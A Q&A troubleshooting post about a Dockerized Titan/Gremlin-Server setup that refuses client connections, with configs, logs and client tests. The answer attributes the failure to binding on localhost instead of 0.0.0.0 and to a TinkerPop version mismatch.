Why can't I connect to Gremlin-Server? (Titan)
Abstract
I'm trying to set up a Titan/Cassandra/Gremlin-Server stack in Docker (v1.13.0). The problem I'm facing is that applications trying to connect to Gremlin-Server on the default port 8182 are reporting errors (details below).
First, here is some relevant version information:
Cassandra v2.2.8
Titan v1.0.0 (Hadoop 1)
Gremlin 3.2.3
Setup
Setup takes place in a Dockerfile in order to be reproducible. It assumes that a Cassandra container already exists, running a cassandra.yaml in which start_rpc has been set to true.
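For reference, a Cassandra container satisfying this assumption could be started along the following lines. This is a hypothetical sketch rather than the exact command from the post: the container name test.cassandra matches the --link used later, and mounting a modified cassandra.yaml (with start_rpc: true) into the official image is just one way to meet the Thrift requirement.
docker run -d --name test.cassandra \
  -v $PWD/conf/cassandra/cassandra.yaml:/etc/cassandra/cassandra.yaml \
  cassandra:2.2.8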
The Dockerfile is as follows:
FROM openjdk:alpine
ENV TITAN 'titan-1.0.0-hadoop1'
RUN apk update && apk add bash unzip && rm -rf /var/cache/apk/* \
&& adduser -S -s /bin/bash -D srg \
&& wget -O /tmp/$TITAN.zip http://s3.thinkaurelius.com/downloads/titan/$TITAN.zip \
&& unzip /tmp/$TITAN.zip -d /opt && ln -s /opt/$TITAN /opt/titan \
&& rm /tmp/*.zip \
&& chown -R srg /opt/$TITAN/ \
&& /opt/titan/bin/gremlin-server.sh -i org.apache.tinkerpop gremlin-python 3.2.3
COPY conf/gremlin-server/* /opt/$TITAN/conf/gremlin-server/
USER srg
WORKDIR /opt/titan
EXPOSE 8182
CMD ["bin/gremlin-server.sh", "conf/gremlin-server/srg.yaml"]
The astute reader will note that I am copying custom configuration files into the container, namely a Gremlin-Server configuration file (srg.yaml) and a Titan graph properties file (srg.properties).
srg.yaml
host: localhost
port: 8182
threadPoolWorker: 1
gremlinPool: 8
scriptEvaluationTimeout: 30000
serializedResponseTimeout: 30000
channelizer: org.apache.tinkerpop.gremlin.server.channel.WebSocketChannelizer
graphs: {
  graph: conf/gremlin-server/srg.properties
}
plugins:
- aurelius.titan
scriptEngines: {
  gremlin-groovy: {
    imports: [java.lang.Math],
    staticImports: [java.lang.Math.PI],
    scripts: [scripts/empty-sample.groovy]},
  gremlin-jython: {},
  gremlin-python: {},
  nashorn: {
    imports: [java.lang.Math],
    staticImports: [java.lang.Math.PI]}}
serializers:
- { className: org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0, config: { useMapperFromGraph: graph }}
- { className: org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0, config: { serializeResultToString: true }}
- { className: org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerGremlinV1d0, config: { useMapperFromGraph: graph }}
- { className: org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV1d0, config: { useMapperFromGraph: graph }}
processors:
- { className: org.apache.tinkerpop.gremlin.server.op.session.SessionOpProcessor, config: { sessionTimeout: 28800000 }}
metrics: {
  consoleReporter: {enabled: true, interval: 180000},
  csvReporter: {enabled: true, interval: 180000, fileName: /tmp/gremlin-server-metrics.csv},
  jmxReporter: {enabled: true},
  slf4jReporter: {enabled: true, interval: 180000},
  gangliaReporter: {enabled: false, interval: 180000, addressingMode: MULTICAST},
  graphiteReporter: {enabled: false, interval: 180000}}
threadPoolBoss: 1
maxInitialLineLength: 4096
maxHeaderSize: 8192
maxChunkSize: 8192
maxContentLength: 65536
maxAccumulationBufferComponents: 1024
resultIterationBatchSize: 64
writeBufferLowWaterMark: 32768
writeBufferHighWaterMark: 65536
ssl: {
  enabled: false}
srg.properties
gremlin.graph=com.thinkaurelius.titan.core.TitanFactory
storage.backend=cassandrathrift
# "cassandra" refers to the linked Cassandra container
storage.hostname=cassandra
cache.db-cache = true
cache.db-cache-clean-wait = 20
cache.db-cache-time = 180000
cache.db-cache-size = 0.25
# Start elasticsearch inside the Titan JVM
index.search.backend=elasticsearch
index.search.directory=db/es
index.search.elasticsearch.client-only=false
index.search.elasticsearch.local-mode=true
Execution
The container is run with the following command: docker run -ti --rm=true --link test.cassandra:cassandra -p 8182:8182 titan.
Here is the log output for Gremlin-Server:
0 [main] INFO org.apache.tinkerpop.gremlin.server.GremlinServer -
\,,,/
(o o)
-----oOOo-(3)-oOOo-----
297 [main] INFO org.apache.tinkerpop.gremlin.server.GremlinServer - Configuring Gremlin Server from conf/gremlin-server/srg.yaml
439 [main] INFO org.apache.tinkerpop.gremlin.server.util.MetricManager - Configured Metrics ConsoleReporter configured with report interval=180000ms
448 [main] INFO org.apache.tinkerpop.gremlin.server.util.MetricManager - Configured Metrics CsvReporter configured with report interval=180000ms to fileName=/tmp/gremlin-server-metrics.csv
557 [main] INFO org.apache.tinkerpop.gremlin.server.util.MetricManager - Configured Metrics JmxReporter configured with domain= and agentId=
561 [main] INFO org.apache.tinkerpop.gremlin.server.util.MetricManager - Configured Metrics Slf4jReporter configured with interval=180000ms and loggerName=org.apache.tinkerpop.gremlin.server.Settings$Slf4jReporterMetrics
1750 [main] INFO com.thinkaurelius.titan.core.util.ReflectiveConfigOptionLoader - Loaded and initialized config classes: 12 OK out of 12 attempts in PT0.148S
1972 [main] INFO com.thinkaurelius.titan.diskstorage.cassandra.thrift.CassandraThriftStoreManager - Closed Thrift connection pooler.
1990 [main] INFO com.thinkaurelius.titan.graphdb.configuration.GraphDatabaseConfiguration - Generated unique-instance-id=ac1100031-ad2d5ffa52e81
2026 [main] INFO com.thinkaurelius.titan.diskstorage.Backend - Configuring index [search]
2386 [main] INFO org.elasticsearch.node - [Lunatik] version[1.5.1], pid[1], build[5e38401/2015-04-09T13:41:35Z]
2387 [main] INFO org.elasticsearch.node - [Lunatik] initializing ...
2399 [main] INFO org.elasticsearch.plugins - [Lunatik] loaded [], sites []
6471 [main] INFO org.elasticsearch.node - [Lunatik] initialized
6472 [main] INFO org.elasticsearch.node - [Lunatik] starting ...
6477 [main] INFO org.elasticsearch.transport - [Lunatik] bound_address {local[1]}, publish_address {local[1]}
6507 [main] INFO org.elasticsearch.discovery - [Lunatik] elasticsearch/u2StmRW1RsyEHw561yoNFw
6519 [elasticsearch[Lunatik][clusterService#updateTask][T#1]] INFO org.elasticsearch.cluster.service - [Lunatik] master {new [Lunatik][u2StmRW1RsyEHw561yoNFw][ad2d5ffa52e8][local[1]]{local=true}}, removed {[Lunatik][kKyL9UE-R123LLZTTrsVCw][ad2d5ffa52e8][local[1]]{local=true},}, reason: local-disco-initial_connect(master)
6908 [main] INFO org.elasticsearch.http - [Lunatik] bound_address {inet[/0:0:0:0:0:0:0:0:9200]}, publish_address {inet[/172.17.0.3:9200]}
6909 [main] INFO org.elasticsearch.node - [Lunatik] started
6923 [elasticsearch[Lunatik][clusterService#updateTask][T#1]] INFO org.elasticsearch.gateway - [Lunatik] recovered [0] indices into cluster_state
7486 [elasticsearch[Lunatik][clusterService#updateTask][T#1]] INFO org.elasticsearch.cluster.metadata - [Lunatik] [titan] creating index, cause [api], templates [], shards [5]/[1], mappings []
8075 [main] INFO com.thinkaurelius.titan.diskstorage.Backend - Initiated backend operations thread pool of size 4
8241 [main] INFO com.thinkaurelius.titan.diskstorage.Backend - Configuring total store cache size: 94787290
8641 [main] INFO com.thinkaurelius.titan.diskstorage.log.kcvs.KCVSLog - Loaded unidentified ReadMarker start time 2017-01-21T16:31:28.750Z into com.thinkaurelius.titan.diskstorage.log.kcvs.KCVSLog$MessagePuller#3520958b
8642 [main] INFO org.apache.tinkerpop.gremlin.server.GremlinServer - Graph [graph] was successfully configured via [conf/gremlin-server/srg.properties].
8643 [main] INFO org.apache.tinkerpop.gremlin.server.util.ServerGremlinExecutor - Initialized Gremlin thread pool. Threads in pool named with pattern gremlin-*
14187 [main] INFO com.jcabi.manifests.Manifests - 108 attributes loaded from 264 stream(s) in 185ms, 108 saved, 3371 ignored: ["Agent-Class", "Ant-Version", "Archiver-Version", "Bnd-LastModified", "Boot-Class-Path", "Build-Date", "Build-Host", "Build-Id", "Build-Java-Version", "Build-Jdk", "Build-Job", "Build-Number", "Build-Time", "Build-Timestamp", "Build-Version", "Built-At", "Built-By", "Built-OS", "Built-On", "Built-Status", "Bundle-ActivationPolicy", "Bundle-Activator", "Bundle-BuddyPolicy", "Bundle-Category", "Bundle-ClassPath", "Bundle-Classpath", "Bundle-Copyright", "Bundle-Description", "Bundle-DocURL", "Bundle-License", "Bundle-Localization", "Bundle-ManifestVersion", "Bundle-Name", "Bundle-NativeCode", "Bundle-RequiredExecutionEnvironment", "Bundle-SymbolicName", "Bundle-Vendor", "Bundle-Version", "Can-Redefine-Classes", "Change", "Class-Path", "Created-By", "DynamicImport-Package", "Eclipse-AutoStart", "Eclipse-BuddyPolicy", "Eclipse-SourceReferences", "Embed-Dependency", "Embedded-Artifacts", "Export-Package", "Extension-Name", "Extension-name", "Fragment-Host", "Git-Commit-Branch", "Git-Commit-Date", "Git-Commit-Hash", "Git-Committer-Email", "Git-Committer-Name", "Gradle-Version", "Gremlin-Lib-Paths", "Gremlin-Plugin-Dependencies", "Gremlin-Plugin-Paths", "Ignore-Package", "Implementation-Build", "Implementation-Build-Date", "Implementation-Title", "Implementation-URL", "Implementation-Vendor", "Implementation-Vendor-Id", "Implementation-Version", "Import-Package", "Include-Resource", "JCabi-Build", "JCabi-Date", "JCabi-Version", "Java-Vendor", "Java-Version", "Main-Class", "Main-class", "Manifest-Version", "Maven-Version", "Module-Email", "Module-Origin", "Module-Owner", "Module-Source", "Originally-Created-By", "Os-Arch", "Os-Name", "Os-Version", "Package", "Premain-Class", "Private-Package", "Require-Bundle", "Require-Capability", "Scm-Connection", "Scm-Revision", "Scm-Url", "Specification-Title", "Specification-Vendor", "Specification-Version", "Tool", "X-Compile-Source-JDK", "X-Compile-Target-JDK", "hash", "implementation-version", "mode", "package", "url", "version"]
14842 [main] INFO org.apache.tinkerpop.gremlin.groovy.engine.ScriptEngines - Loaded gremlin-jython ScriptEngine
15540 [main] INFO org.apache.tinkerpop.gremlin.groovy.engine.ScriptEngines - Loaded nashorn ScriptEngine
16076 [main] INFO org.apache.tinkerpop.gremlin.groovy.engine.ScriptEngines - Loaded gremlin-python ScriptEngine
16553 [main] INFO org.apache.tinkerpop.gremlin.groovy.engine.ScriptEngines - Loaded gremlin-groovy ScriptEngine
17410 [main] INFO org.apache.tinkerpop.gremlin.groovy.engine.GremlinExecutor - Initialized gremlin-groovy ScriptEngine with scripts/empty-sample.groovy
17410 [main] INFO org.apache.tinkerpop.gremlin.server.util.ServerGremlinExecutor - Initialized GremlinExecutor and configured ScriptEngines.
17419 [main] INFO org.apache.tinkerpop.gremlin.server.util.ServerGremlinExecutor - A GraphTraversalSource is now bound to [g] with graphtraversalsource[standardtitangraph[cassandrathrift:[cassandra]], standard]
17565 [main] INFO org.apache.tinkerpop.gremlin.server.AbstractChannelizer - Configured application/vnd.gremlin-v1.0+gryo with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0
17566 [main] INFO org.apache.tinkerpop.gremlin.server.AbstractChannelizer - Configured application/vnd.gremlin-v1.0+gryo-stringd with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0
17808 [main] INFO org.apache.tinkerpop.gremlin.server.AbstractChannelizer - Configured application/vnd.gremlin-v1.0+json with org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerGremlinV1d0
17811 [main] INFO org.apache.tinkerpop.gremlin.server.AbstractChannelizer - Configured application/json with org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV1d0
17958 [gremlin-server-boss-1] INFO org.apache.tinkerpop.gremlin.server.GremlinServer - Gremlin Server configured with worker thread pool of 1, gremlin pool of 8 and boss thread pool of 1.
17959 [gremlin-server-boss-1] INFO org.apache.tinkerpop.gremlin.server.GremlinServer - Channel started at port 8182.
1/21/17 4:34:20 PM =============================================================
-- Meters ----------------------------------------------------------------------
org.apache.tinkerpop.gremlin.server.GremlinServer.errors
count = 0
mean rate = 0.00 events/second
1-minute rate = 0.00 events/second
5-minute rate = 0.00 events/second
15-minute rate = 0.00 events/second
180564 [metrics-logger-reporter-thread-1] INFO org.apache.tinkerpop.gremlin.server.Settings$Slf4jReporterMetrics - type=METER, name=org.apache.tinkerpop.gremlin.server.GremlinServer.errors, count=0, mean_rate=0.0, m1=0.0, m5=0.0, m15=0.0, rate_unit=events/second
Symptoms
So far, everything appears to be working as intended. The logs indicate that srg.properties is loaded successfully and that the resulting Titan graph is bound to a variable called graph.
The problem appears when I try to connect to the Gremlin-Server instance over the published port 8182, for example using gremlin-python:
# executed via python 3.6.0 on the host machine, i.e. not inside of Docker
from gremlin_python import statics
from gremlin_python.structure.graph import Graph
from gremlin_python.process.graph_traversal import __
from gremlin_python.process.strategies import *
from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection
graph = Graph()
g = graph.traversal().withRemote(DriverRemoteConnection('ws://localhost:8182/gremlin','graph'))
produces the following exception ...
---------------------------------------------------------------------------
HTTPError Traceback (most recent call last)
<ipython-input-10-59ad504f29b4> in <module>()
----> 1 g = graph.traversal().withRemote(DriverRemoteConnection('ws://localhost:8182/','g'))
/Users/lthibault/.pyenv/versions/3.6.0/lib/python3.6/site-packages/gremlin_python/driver/driver_remote_connection.py in __init__(self, url, traversal_source, username, password, loop, graphson_reader, graphson_writer)
41 self._password = password
42 if loop is None: self._loop = ioloop.IOLoop.current()
---> 43 self._websocket = self._loop.run_sync(lambda: websocket.websocket_connect(self.url))
44 self._graphson_reader = graphson_reader or GraphSONReader()
45 self._graphson_writer = graphson_writer or GraphSONWriter()
/Users/lthibault/.pyenv/versions/3.6.0/lib/python3.6/site-packages/tornado/ioloop.py in run_sync(self, func, timeout)
455 if not future_cell[0].done():
456 raise TimeoutError('Operation timed out after %s seconds' % timeout)
--> 457 return future_cell[0].result()
458
459 def time(self):
/Users/lthibault/.pyenv/versions/3.6.0/lib/python3.6/site-packages/tornado/concurrent.py in result(self, timeout)
235 return self._result
236 if self._exc_info is not None:
--> 237 raise_exc_info(self._exc_info)
238 self._check_done()
239 return self._result
/Users/lthibault/.pyenv/versions/3.6.0/lib/python3.6/site-packages/tornado/util.py in raise_exc_info(exc_info)
HTTPError: HTTP 599: Stream closed
Suspecting a problem specific to this library, I ran two further tests:
1) attempt to connect to the websocket port with nc
$ nc -z -v localhost 8182
found 0 associations
found 1 connections:
1: flags=82<CONNECTED,PREFERRED>
outif lo0
src ::1 port 58627
dst ::1 port 8182
rank info not available
TCP aux info available
Connection to localhost port 8182 [tcp/*] succeeded!
2) attempt to connect to Gremlin-Server using a different client library, namely go-gremlin
Test case:
package main
import (
"fmt"
"log"
"github.com/go-gremlin/gremlin"
)
func main() {
if err := gremlin.NewCluster("ws://localhost:8182/gremlin"); err != nil {
log.Fatal(err)
}
data, err := gremlin.Query(`graph.V()`).Exec()
if err != nil {
log.Fatalf("Query error: %s", err)
}
fmt.Println(string(data))
}
Output:
$ go run cmd/test/main.go
2017/01/21 14:47:42 Query error: unexpected EOF
exit status 1
Current Conclusions & Questions
From the previous tests, I conclude that this is an application-level problem (i.e. a problem at the WebSocket protocol level, not in the host or container networking stack). Indeed, nc reports that the TCP connection succeeds, but both the Python and Go client libraries complain of what appears to be an inappropriate (empty) response from the server.
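A further check worth making here (not part of the original post) is to look at which address Gremlin Server has actually bound inside the container. Assuming busybox's netstat is available in the openjdk:alpine image, and where <container-id> is the running Titan container:
docker exec -it <container-id> netstat -tln
If port 8182 shows up as 127.0.0.1:8182 rather than 0.0.0.0:8182 (or :::8182), the server is only reachable from inside the container; Docker's userland proxy will still accept the TCP handshake on the host, which would explain why nc reports success while the WebSocket clients see the stream closed.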
I have tried removing the /gremlin path from the websocket URL both in gremlin-python and in go-gremlin, to no avail.
My question is: where do I go from here? Any suggestions or diagnostic paths would be most appreciated!
The main problem is that the host in your Gremlin Server configuration is set to the default, which is localhost. This only allows connections from the server itself, i.e. from inside the container. You need to change the value to an external IP of the server or to 0.0.0.0.
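In this setup that means editing srg.yaml, for example:
host: 0.0.0.0
port: 8182
With host: 0.0.0.0 the server binds all interfaces, so the port published with -p 8182:8182 becomes reachable from the host.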
The other issue is that the gremlin-python server plugin was made available with Apache TinkerPop 3.2.2. Titan 1.0.0 uses TinkerPop 3.0.1. I doubt that the gremlin-python 3.2.3 plugin will work with Titan 1.0.0.
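A quick way to confirm the TinkerPop version bundled with Titan is to look at the jars it ships (a hedged check; the exact jar name may differ):
ls /opt/titan/lib | grep gremlin-core
For Titan 1.0.0 this should show something like gremlin-core-3.0.1-incubating.jar, i.e. TinkerPop 3.0.1 rather than 3.2.x.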
Update: Consider using JanusGraph 0.1.1, which uses TinkerPop 3.2.3. JanusGraph was forked from Titan, so the code is essentially the same with updated dependencies.
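If you switch, the graph properties change is small; a sketch of the equivalent srg.properties entries for JanusGraph (class and backend names taken from JanusGraph 0.1.x, so verify against its documentation):
gremlin.graph=org.janusgraph.core.JanusGraphFactory
storage.backend=cassandrathrift
storage.hostname=cassandra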